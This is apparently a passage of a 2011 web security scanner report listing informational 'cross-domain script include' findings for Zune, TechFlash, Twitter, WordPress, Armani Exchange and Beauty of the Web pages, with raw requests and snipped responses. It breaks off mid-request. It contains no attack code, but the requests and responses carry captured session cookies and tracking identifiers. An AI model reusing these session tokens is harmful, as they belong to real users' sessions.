When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


14.1. http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web HTTP/1.1
Host: social.zune.net
Proxy-Connection: keep-alive
Referer: http://zune.net/en-US/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EXPUID=dcc9a7e6-6804-4906-b5d8-7b37c2f999d3; defCulture=en-US; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940283855:ss=1309940283855; lastCulture=en-US

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: ec73cbe3-4917-444b-8d6c-93f60f1a09fb,848807
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
lx-svr: S803
X-Powered-By: ASP.NET
Content-Length: 30161
Cache-Control: no-cache, no-store
Expires: Wed, 06 Jul 2011 11:19:49 GMT
Date: Wed, 06 Jul 2011 11:19:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...
</span>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

14.2. http://social.zune.net/TV/SERIES/FUTURAMA/06FC3866-29D7-4B23-AD8A-D1A2EBD4C35D

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /TV/SERIES/FUTURAMA/06FC3866-29D7-4B23-AD8A-D1A2EBD4C35D

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /TV/SERIES/FUTURAMA/06FC3866-29D7-4B23-AD8A-D1A2EBD4C35D HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: f0ad3f48-2b8a-4108-b988-3f6c8b171e02,892914
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
lx-svr: S501
X-Powered-By: ASP.NET
Cache-Control: no-cache, no-store
Expires: Wed, 06 Jul 2011 14:06:35 GMT
Date: Wed, 06 Jul 2011 14:06:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 83404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...
</span>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

14.3. http://social.zune.net/album/F59FD406-0100-11DB-89CA-0019B92A3933

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.zune.net
Path:   /album/F59FD406-0100-11DB-89CA-0019B92A3933

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /album/F59FD406-0100-11DB-89CA-0019B92A3933 HTTP/1.1
Host: social.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
eid: f0ad3f48-2b8a-4108-b988-3f6c8b171e02,892904
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
lx-svr: S501
X-Powered-By: ASP.NET
Cache-Control: no-cache, no-store
Expires: Wed, 06 Jul 2011 14:06:33 GMT
Date: Wed, 06 Jul 2011 14:06:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 85358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...
</span>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

14.4. http://techflash.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://techflash.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: techflash.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:00:33 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 95667


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<t
...[SNIP]...
<link href="http://www2.bizjournals.com/css/techflash.css?v=18" rel="stylesheet" type="text/css" />

<script type="text/javascript" src="http://www2.bizjournals.com/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www2.bizjournals.com/js/jquery-impromptu.1.3.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="TechFlash" href="http://feeds.feedburner.com/TechFlash">
<script src="http://www2.bizjournals.com/js/tabs.js?v=10" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script src="http://www2.bizjournals.com/js/jquery.form.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www2.bizjournals.com/js/omniture.js?v=14"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=1) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/home_page;beh=;pos=t1;vs=commercial;sz=728x90;tile=1;kw=seattle;dcopt=ist;ord=1309960833.377779.8056?" target="_blank"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="//www.google.com/jsapi"></script>
...[SNIP]...
</h4>

<script type="text/javascript" src="http://www.masshightech.com/tech-news-widget/widget.js"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=2) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/home_page;beh=;pos=c1;vs=commercial;sz=300x250;tile=2;kw=seattle;ord=1309960833.377779.8056?" target="_blank"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=3) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/home_page;beh=;pos=but1;vs=commercial;sz=125x125;tile=3;kw=seattle;ord=1309960833.377779.8056?" target="_blank"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=4) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/home_page;beh=;pos=but2;vs=commercial;sz=125x125;tile=4;kw=seattle;ord=1309960833.377779.8056?" target="_blank"></script>
...[SNIP]...
<div id="footer">
<script src="http://content.dl-rms.com/rms/mother/5261/nodetag.js"></script>
...[SNIP]...
<!-- Start Quantcast tag --><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Revenue Science API --><script src="http://js.revsci.net/gateway/gw.js?csid=K08784"></script>
...[SNIP]...

14.5. http://techflash.com/about.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://techflash.com
Path:   /about.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about.html HTTP/1.1
Host: techflash.com
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-399196261-1309960828609; s_pers=%20s_vnum%3D1312552828670%2526vn%253D1%7C1312552828670%3B%20s_lv%3D1309960845575%7C1404568845575%3B%20s_lv_s%3DFirst%2520Visit%7C1309962645575%3B%20s_dslv%3DFirst%2520Visit%7C1310565645579%3B%20s_p12%3DFirst%2520Visit%7C1310565645581%3B%20s_invisit%3Dtrue%7C1309962645583%3B; s_sess=%20s_ria%3Dflash%252010%257Csilverlight%2520not%2520detected%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:01:12 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49181


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<t
...[SNIP]...
<link href="http://www2.bizjournals.com/css/techflash.css?v=18" rel="stylesheet" type="text/css" />

<script type="text/javascript" src="http://www2.bizjournals.com/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www2.bizjournals.com/js/jquery-impromptu.1.3.js"></script>
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="TechFlash" href="http://feeds.feedburner.com/TechFlash">
<script src="http://www2.bizjournals.com/js/tabs.js?v=10" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script src="http://www2.bizjournals.com/js/jquery.form.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www2.bizjournals.com/js/omniture.js?v=14"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=1) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/;beh=;pos=t1;sz=728x90;tile=1;kw=seattle;dcopt=ist;ord=1309960872.704924.6709?" target="_blank"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="//www.google.com/jsapi"></script>
...[SNIP]...
</h4>

<script type="text/javascript" src="http://www.masshightech.com/tech-news-widget/widget.js"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=2) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/;beh=;pos=c1;sz=300x250;tile=2;kw=seattle;ord=1309960872.704924.6709?" target="_blank"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=3) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/;beh=;pos=but1;sz=125x125;tile=3;kw=seattle;ord=1309960872.704924.6709?" target="_blank"></script>
...[SNIP]...
<!-- Begin DFP ad tag block (tile=4) -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.techflash/;beh=;pos=but2;sz=125x125;tile=4;kw=seattle;ord=1309960872.704924.6709?" target="_blank"></script>
...[SNIP]...
<div id="footer">
<script src="http://content.dl-rms.com/rms/mother/5261/nodetag.js"></script>
...[SNIP]...
<!-- Start Quantcast tag --><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Revenue Science API --><script src="http://js.revsci.net/gateway/gw.js?csid=K08784"></script>
...[SNIP]...

14.6. http://twitter.com/account/resend_password

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /account/resend_password

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account/resend_password HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309951241-12181-54756
ETag: "3a31a002396e5b8f5874b4d7f47a249e"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:20:41 GMT
X-Runtime: 0.02223
Content-Type: text/html; charset=utf-8
Content-Length: 10499
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 953b6510a72c9af390c83823f847aaa0b9be8818
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1Ogxjc3JmX2lkIiUzZTA3YTMyYzhmOThkYmNi%250AMTRlMzRhNDVjNDMyZDNhNSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--14f6b43e796db4ce15e8d70d84d63b17d3a42eef; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.google.com/recaptcha/api/challenge?k=6LfbTAAAAAAAAE0hk8Vnfd1THHnn9lJuow6fgulO&lang=en"></script>
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1309899422/javascripts/twitter.js?1309893581" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1309899422/javascripts/lib/jquery.tipsy.min.js?1309893581" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1309899422/javascripts/lib/gears_init.js?1309893581" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1309899422/javascripts/lib/mustache.js?1309893581" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1309899422/javascripts/geov1.js?1309893581" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1309899422/javascripts/api.js?1309893581" type="text/javascript"></script>
...[SNIP]...

14.7. http://twitter.com/intent/session

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /intent/session

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /intent/session?return_to=%2Fintent%2Ftweet%3Fsource%3Dwebclient%26text%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx&source=webclient&text=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: js=1; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; k=173.193.214.243.1309445969207029; guest_id=v1%3A13086187569807267; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--68bfb23ecb75192721faa31141f4cc93644031bd

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309950927-60253-54088
ETag: "36b99243bfb315e43cf77ffb34f0123a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:15:27 GMT
X-Runtime: 0.01137
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8d1959539e4fb4977e5ce9becc49dc0a878abe53
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1Ogxjc3JmX2lkIiUzZTA3YTMyYzhmOThkYmNi%250AMTRlMzRhNDVjNDMyZDNhNSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--14f6b43e796db4ce15e8d70d84d63b17d3a42eef; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 4344
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width; initial-scale=1.0;
...[SNIP]...
</script>

<script src="http://a1.twimg.com/a/1309899422/javascripts/loadrunner.js" data-main="tfw/intents/main" data-path="http://a1.twimg.com/a/1309899422/javascripts/modules" type="text/javascript"></script>
...[SNIP]...

14.8. https://wordpress.com/wp-login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wordpress.com
Path:   /wp-login.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-login.php HTTP/1.1
Host: wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Jul 2011 11:21:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: hiab=on; path=/; domain=.wordpress.com
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; domain=.wordpress.com
Content-Length: 3666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <meta
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

14.9. http://www.armaniexchange.com/category/womens/sunglasses.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.armaniexchange.com
Path:   /category/womens/sunglasses.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/womens/sunglasses.do HTTP/1.1
Host: www.armaniexchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Expires: Wed, 06 Jul 2011 14:07:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:07:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: customer=none; path=/; expires=Fri, 19-Jul-2013 14:07:28 GMT
Set-Cookie: basket=none; path=/; expires=Wed, 20-Jul-2011 14:07:28 GMT
Set-Cookie: JSESSIONID=b4cv-ltssK9foaMX-d; path=/
Content-Length: 174474


        <script language="JavaScript">
// Disable edit cell tab.
parent.editCell.cl
...[SNIP]...
<link
href="http://t.p.mybuys.com/css/mbstyles.css"
type="text/css"
rel="stylesheet"
id="mybuysstyles">
<script
type="text/javascript"
src="http://t.p.mybuys.com/js/mybuys3.js">

</script>
<script
type="text/javascript"
src="http://t.p.mybuys.com/clients/ARMANIEXCHANGE/js/setup.js">

</script>
...[SNIP]...

14.10. http://www.armaniexchange.com/storelocator.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.armaniexchange.com
Path:   /storelocator.do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /storelocator.do HTTP/1.1
Host: www.armaniexchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Expires: Wed, 06 Jul 2011 14:07:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 06 Jul 2011 14:07:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: customer=none; path=/; expires=Fri, 19-Jul-2013 14:07:29 GMT
Set-Cookie: basket=none; path=/; expires=Wed, 20-Jul-2011 14:07:29 GMT
Set-Cookie: JSESSIONID=cnJmPlEr-4b-hiMX-d; path=/
Content-Length: 52997


<script language="JavaScript">
// Disable edit cell tab.
parent.editCell.className = "tab-button-dis";

function saveForm() {
location.replace
...[SNIP]...
<link
href="http://t.p.mybuys.com/css/mbstyles.css"
type="text/css"
rel="stylesheet"
id="mybuysstyles">
<script
type="text/javascript"
src="http://t.p.mybuys.com/js/mybuys3.js">

</script>
<script
type="text/javascript"
src="http://t.p.mybuys.com/clients/ARMANIEXCHANGE/js/setup.js">

</script>
...[SNIP]...

14.11. http://www.beautyoftheweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyoftheweb.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.beautyoftheweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Wed, 06 Jul 2011 15:34:55 GMT

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=181
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 15:41:55 GMT
Last-Modified: Wed, 06 Jul 2011 15:36:55 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:54 GMT
Content-Length: 13816


<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8" />
   <title>Download Internet Explorer 9 - Beauty of the Web</title>
<meta http
...[SNIP]...
</script>
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
</footer>


<script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script>
<script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=7.0&mkt=sr-La"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...

14.12. http://www.beautyoftheweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyoftheweb.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.beautyoftheweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=135
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 15:41:06 GMT
Last-Modified: Wed, 06 Jul 2011 15:36:06 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:38:51 GMT
Content-Length: 13816


<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8" />
   <title>Download Internet Explorer 9 - Beauty of the Web</title>
<meta http
...[SNIP]...
</script>
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
</footer>


<script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script>
<script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=7.0&mkt=en-US"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...

14.13. http://www.beautyoftheweb.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beautyoftheweb.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.beautyoftheweb.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=mswindowsbow%3D%2526pid%253Dbow%25253A%252520highlights/sites-amaze%2526pidt%253D1%2526oid%253Dhttp%25253A//www.beautyoftheweb.com/downloadie9%2526ot%253DA
If-Modified-Since: Wed, 06 Jul 2011 15:36:55 GMT

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=292
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 15:45:55 GMT
Last-Modified: Wed, 06 Jul 2011 15:40:55 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:41:03 GMT
Content-Length: 13816


<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8" />
   <title>Download Internet Explorer 9 - Beauty of the Web</title>
<meta http
...[SNIP]...
</script>
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
</footer>


<script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script>
<script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=7.0&mkt=en-gb"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...

14.14. http://www.bebo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.bebo.com
Proxy-Connection: keep-alive
